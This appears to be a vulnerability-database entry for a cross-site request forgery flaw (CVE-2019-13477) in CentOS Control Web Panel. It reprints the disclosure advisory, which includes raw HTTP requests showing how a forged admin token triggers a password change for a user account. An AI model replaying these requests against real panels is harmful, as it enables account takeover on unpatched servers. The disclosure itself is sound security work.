CentOS 7.6.1810 Control Web Panel 0.9.8.837 Cross Site Request Forgery

🗓️ 26 Aug 2019 00:00:00Reported by Pongtorn AngsuchotmeteeType

packetstorm🔗 packetstormsecurity.com👁 361 Views

Control Web Panel CSRF vulnerability, version 0.9.8.837, fixed on version 0.9.8.85

Reporter	Title	Published	Views	Family All 10
0day.today	CentOS 7.6.1810 Control Web Panel 0.9.8.837 Cross Site Request Forgery Vulnerability	26 Aug 201900:00	–	zdt
CNVD	CentOS Web Panel Cross-Site Request Forgery Vulnerability (CNVD-2019-40074)	22 Aug 201900:00	–	cnvd
CVE	CVE-2019-13477	21 Aug 201918:55	–	cve
Cvelist	CVE-2019-13477	21 Aug 201918:55	–	cvelist
EUVD	EUVD-2019-4945	7 Oct 202500:30	–	euvd
NVD	CVE-2019-13477	21 Aug 201919:15	–	nvd
OSV	CVE-2019-13477	21 Aug 201919:15	–	osv
Prion	Cross site request forgery (csrf)	21 Aug 201919:15	–	prion
Positive Technologies	PT-2019-4343 · Centos · Centos Web Panel	20 Aug 201900:00	–	ptsecurity
RedhatCVE	CVE-2019-13477	22 May 202510:05	–	redhatcve

`Cross-Site Request Forgery (CSRF)  
  
  
# ====================================================================  
# Information  
# ====================================================================  
  
Product : CWP Control Web Panel  
version : 0.9.8.837  
Fixed on : 0.9.8.851  
Test on : CentOS 7.6.1810 (Core)  
Reference : https://control-webpanel.com/  
CVE-Number : 2019-13477  
  
  
Original request  
  
POST /cwp_4a1498ae31fc95e1b03f1a62d336b154/admin/loader_ajax.php?ajax=list_accounts HTTP/1.1  
Host: 192.168.75.148:2087  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://192.168.75.148:2087/cwp_4a1498ae31fc95e1b03f1a62d336b154/admin/index.php?module=list_accounts  
Content-Type: application/x-www-form-urlencoded  
X-Requested-With: XMLHttpRequest  
Content-Length: 50  
Connection: close  
Cookie: cwpsrv-bad194011f5ad0cf609c77ad222e50d6=53tt3djbnhepcprdbtoc7uc4d2; _firstImpression=true  
  
accion=changePass&pass=UEBzc3cwcmQ=&username=user1  
  
  
  
  
Even the url has token value,but the token only check for pattern "cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"  
modify the end of the token value   
  
POST /cwp_99999999999999999999999999999999/admin/loader_ajax.php?ajax=list_accounts HTTP/1.1  
Host: 192.168.75.148:2087  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://192.168.75.148:2087/cwp_4a1498ae31fc95e1b03f1a62d336b154/admin/index.php?module=list_accounts  
Content-Type: application/x-www-form-urlencoded  
X-Requested-With: XMLHttpRequest  
Content-Length: 50  
Connection: close  
Cookie: cwpsrv-bad194011f5ad0cf609c77ad222e50d6=53tt3djbnhepcprdbtoc7uc4d2; _firstImpression=true  
  
accion=changePass&pass=UEBzc3cwcmQ=&username=user1  
  
  
  
# ====================================================================  
# PoC  
# ====================================================================  
https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13477.md  
  
  
# ====================================================================  
# Timeline  
# ====================================================================  
2019-06-05: Discovered the bug  
2019-06-05: Reported to vendor  
2019-06-05: Vender accepted the vulnerability  
2019-07-17: The vulnerability has been fixed  
2019-08-20: published  
  
  
# ====================================================================  
# Discovered by  
# ====================================================================  
Pongtorn Angsuchotmetee  
Nissana Sirijirakal  
Narin Boonwasanarak  
  
  
  
`

26 Aug 2019 00:00Current

0.3Low risk

Vulners AI Score0.3

EPSS0.00112